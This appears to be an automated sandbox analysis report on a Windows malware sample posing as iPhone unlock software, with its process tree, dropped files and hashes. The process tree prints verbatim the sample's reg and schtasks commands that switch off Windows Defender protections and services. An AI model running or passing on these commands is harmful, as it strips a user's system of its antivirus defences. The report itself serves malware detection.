Analysis

  • max time kernel
    151s
  • max time network
    85s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2023 21:46

General

  • Target

    F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe

  • Size

    16.0MB

  • MD5

    0f007d899ab6ef50e71a1acfd1ab4147

  • SHA1

    6cbb099844201db58f34f41720b001f6e10d6197

  • SHA256

    f816ea850eca0a23b99541054eddc2ac01971bb502dcf1231dc02ed58282365f

  • SHA512

    a49c5898e060c0bf5e35608740c2317283e6f13d6f70bc62b1648689e7ba19e83d3c8b179aa1f37b0a57469edc75e30b1d0f93b4b065f361627a6e64065bc91c

  • SSDEEP

    393216:T3HBq+lXKkz4XNC6JMxBEMYUUwE+hxRgNqw+VNdT0Qxq+I:jVdxwNC6JgBEIzD/gkfVPZVI

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
    "C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe
      "C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D84.tmp\6D85.tmp\6D86.bat C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
          4⤵
            PID:1636
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            4⤵
              PID:2008
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              4⤵
                PID:1524
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                4⤵
                  PID:2200
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  4⤵
                    PID:4264
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3172
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3436
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:628
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:2420
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3884
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1824
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:3024
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                        4⤵
                          PID:2972
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                          4⤵
                            PID:3680
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            4⤵
                              PID:3324
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                              4⤵
                                PID:4468
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                4⤵
                                  PID:316
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                  4⤵
                                    PID:4284
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                    4⤵
                                      PID:3776
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                      4⤵
                                        PID:4396
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                        4⤵
                                          PID:4204
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                          4⤵
                                            PID:4152
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                            4⤵
                                              PID:2620
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                              4⤵
                                                PID:3220
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                4⤵
                                                  PID:3304
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                  4⤵
                                                    PID:2012
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                    4⤵
                                                      PID:3432
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                      4⤵
                                                        PID:2768
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                        4⤵
                                                          PID:5024
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                          4⤵
                                                            PID:1048
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                            • Modifies security service
                                                            PID:1540
                                                      • C:\Users\Admin\AppData\Roaming\NanWin.exe
                                                        "C:\Users\Admin\AppData\Roaming\NanWin.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2216
                                                      • C:\Users\Admin\AppData\Roaming\ParaWin.exe
                                                        "C:\Users\Admin\AppData\Roaming\ParaWin.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops startup file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4580
                                                      • C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe
                                                        "C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4628
                                                        • C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp" /SL5="$E004A,15327349,546304,C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1648

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\6D84.tmp\6D85.tmp\6D86.bat

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      35b74dad14475b9684b5afa31b75f3fa

                                                      SHA1

                                                      59c915df0361253e87d8e7fc24a7f45215949f44

                                                      SHA256

                                                      9d2bfa4eb93d0026edafa2f6fdc06faa591be4334f739adae413247a7019fe8b

                                                      SHA512

                                                      85383abab6052210425db6d6b139e504a786765dd7cb085991f8867c45932ab1a98bdfe77d737751c551b9c6c25de0d9fb5d9d41375deca43da327c306239590

                                                    • C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp

                                                      Filesize

                                                      1.5MB

                                                      MD5

                                                      844384b7d563f094910e2b986ded3320

                                                      SHA1

                                                      df9661693cb55116b653dba682aa9819bee59849

                                                      SHA256

                                                      6eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f

                                                      SHA512

                                                      a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f

                                                    • C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp

                                                      Filesize

                                                      1.5MB

                                                      MD5

                                                      844384b7d563f094910e2b986ded3320

                                                      SHA1

                                                      df9661693cb55116b653dba682aa9819bee59849

                                                      SHA256

                                                      6eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f

                                                      SHA512

                                                      a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe

                                                      Filesize

                                                      412KB

                                                      MD5

                                                      610696767503d1e65a0f00892ae76748

                                                      SHA1

                                                      f4c666cb6e6f85c702173eebfe0fedb74061f755

                                                      SHA256

                                                      a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1

                                                      SHA512

                                                      2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de

                                                    • C:\Users\Admin\AppData\Roaming\NanWin.exe

                                                      Filesize

                                                      412KB

                                                      MD5

                                                      610696767503d1e65a0f00892ae76748

                                                      SHA1

                                                      f4c666cb6e6f85c702173eebfe0fedb74061f755

                                                      SHA256

                                                      a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1

                                                      SHA512

                                                      2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de

                                                    • C:\Users\Admin\AppData\Roaming\NanWin.exe

                                                      Filesize

                                                      412KB

                                                      MD5

                                                      610696767503d1e65a0f00892ae76748

                                                      SHA1

                                                      f4c666cb6e6f85c702173eebfe0fedb74061f755

                                                      SHA256

                                                      a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1

                                                      SHA512

                                                      2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de

                                                    • C:\Users\Admin\AppData\Roaming\ParaWin.exe

                                                      Filesize

                                                      335KB

                                                      MD5

                                                      0335dc59409a50d9dd55bf2c103be4a3

                                                      SHA1

                                                      74a326b31f47b5acce81d057345379296efb3a8c

                                                      SHA256

                                                      829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7

                                                      SHA512

                                                      ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59

                                                    • C:\Users\Admin\AppData\Roaming\ParaWin.exe

                                                      Filesize

                                                      335KB

                                                      MD5

                                                      0335dc59409a50d9dd55bf2c103be4a3

                                                      SHA1

                                                      74a326b31f47b5acce81d057345379296efb3a8c

                                                      SHA256

                                                      829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7

                                                      SHA512

                                                      ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59

                                                    • C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe

                                                      Filesize

                                                      20.0MB

                                                      MD5

                                                      8c5dd78ab39b61f7d55b15bb283df424

                                                      SHA1

                                                      cd695484bdb7fbce5cd223159fbdd36a336f4914

                                                      SHA256

                                                      5769ccef917fe78906c41ae332f08429401798483fa47a61fd8f90c77a2a3ce8

                                                      SHA512

                                                      f9b063c91baf3548448ce2476337789d591e88d376a3c7530fd36006980a1a0fea23b6298d50e3264ff25507d337a54d8db4910a1754be2c7701f4f27a7cc423

                                                    • C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe

                                                      Filesize

                                                      20.0MB

                                                      MD5

                                                      8c5dd78ab39b61f7d55b15bb283df424

                                                      SHA1

                                                      cd695484bdb7fbce5cd223159fbdd36a336f4914

                                                      SHA256

                                                      5769ccef917fe78906c41ae332f08429401798483fa47a61fd8f90c77a2a3ce8

                                                      SHA512

                                                      f9b063c91baf3548448ce2476337789d591e88d376a3c7530fd36006980a1a0fea23b6298d50e3264ff25507d337a54d8db4910a1754be2c7701f4f27a7cc423

                                                    • C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe

                                                      Filesize

                                                      15.1MB

                                                      MD5

                                                      48c26c1d7339c99e2c0dbba5af874176

                                                      SHA1

                                                      547a9984003102d58dacc176621ce00d09e00728

                                                      SHA256

                                                      94ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782

                                                      SHA512

                                                      d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e

                                                    • C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe

                                                      Filesize

                                                      15.1MB

                                                      MD5

                                                      48c26c1d7339c99e2c0dbba5af874176

                                                      SHA1

                                                      547a9984003102d58dacc176621ce00d09e00728

                                                      SHA256

                                                      94ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782

                                                      SHA512

                                                      d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e

                                                    • memory/2216-155-0x0000000004EB0000-0x0000000004F42000-memory.dmp

                                                      Filesize

                                                      584KB

                                                    • memory/2216-148-0x00000000005A0000-0x000000000060E000-memory.dmp

                                                      Filesize

                                                      440KB

                                                    • memory/2216-151-0x0000000005550000-0x0000000005AF4000-memory.dmp

                                                      Filesize

                                                      5.6MB

                                                    • memory/4580-162-0x00000000058B0000-0x0000000005916000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/4580-159-0x00000000055B0000-0x000000000564C000-memory.dmp

                                                      Filesize

                                                      624KB

                                                    • memory/4580-149-0x0000000000AA0000-0x0000000000AFC000-memory.dmp

                                                      Filesize

                                                      368KB

                                                    • memory/4628-158-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB

                                                    • memory/4628-189-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB

                                                    • memory/4628-146-0x0000000000400000-0x000000000048F000-memory.dmp

                                                      Filesize

                                                      572KB